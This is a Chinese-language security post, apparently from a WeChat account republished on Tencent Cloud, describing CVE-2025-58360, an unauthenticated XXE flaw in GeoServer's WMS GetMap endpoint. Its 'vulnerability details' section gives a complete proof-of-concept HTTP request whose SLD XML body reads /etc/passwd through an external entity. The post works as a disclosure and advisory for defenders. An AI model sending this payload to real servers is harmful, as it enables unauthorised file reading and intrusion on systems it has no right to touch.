首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2025-58360|GeoServer未经授权的XML外部实体注入漏洞(POC)

CVE-2025-58360|GeoServer未经授权的XML外部实体注入漏洞(POC)

作者头像
信安百科
发布2025-12-16 14:19:56
发布2025-12-16 14:19:56
6650
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

GeoServer是基于Java 的软件服务器,允许用户查看和编辑地理空间数据。使用开放地理空间联盟(OGC)提出的开放标准,GeoServer在地图创建和数据共享方面具有极大的灵活性。

GeoServer允许您向世界显示您的空间信息。实施Web地图服务(WMS)标准,GeoServer可以创建各种输出格式的地图。一个免费的地图库 OpenLayers 已集成到GeoServer中,从而使地图生成快速简便。GeoServer基于GeoTools(一种开放源 Java GIS 工具包)构建。

兼容WMS和WFS特性,支持PostgreSQL、Shapefile、ArcSDE、Oracle、VPF、MySQL、MapInfo,支持上百种投影,能够将网络地图输出为jpeg、gif、png、SVG、KML等格式,能够运行在任何基于J2EE/Servlet容器之上,嵌入MapBuilder支持AJAX的地图客户端OpenLayers,除此之外还包括许多其他的特性。

0x01 漏洞描述

GeoServer XML外部实体注入漏洞(XXE)漏洞存在于/geoserver/wms端点的WMS GetMap请求中。当服务器接收XML形式的SLD样式定义时,由于解析器未正确禁用外部实体,攻击者可构造恶意XML注入实体引用,进而:

  • 读取服务器任意敏感文件(/etc/passwd、配置文件等)
  • 获取系统信息
  • 触发 SSRF(取决于解析器实现)
  • 或导致拒绝服务

0x02 CVE编号

CVE-2025-58360

0x03 影响版本

代码语言:javascript
复制
GeoServer < 2.25.6
2.26.0 <= GeoServer < 2.26.2

0x04 漏洞详情

代码语言:javascript
复制
POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&layers=topp:states&bbox=-130,24,-66,50&width=800&height=400&srs=EPSG:4326&format=image/png HTTP/1.1
Host: ip
Content-Type: application/vnd.ogc.sld+xml

<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE StyledLayerDescriptor [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
<StyledLayerDescriptor version="1.0.0" xmlns="http://www.opengis.net/sld">
  <NamedLayer>
    <Name>&xxe;</Name>
    <UserStyle/>
  </NamedLayer>
</StyledLayerDescriptor>

0x05 参考链接

https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-12-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档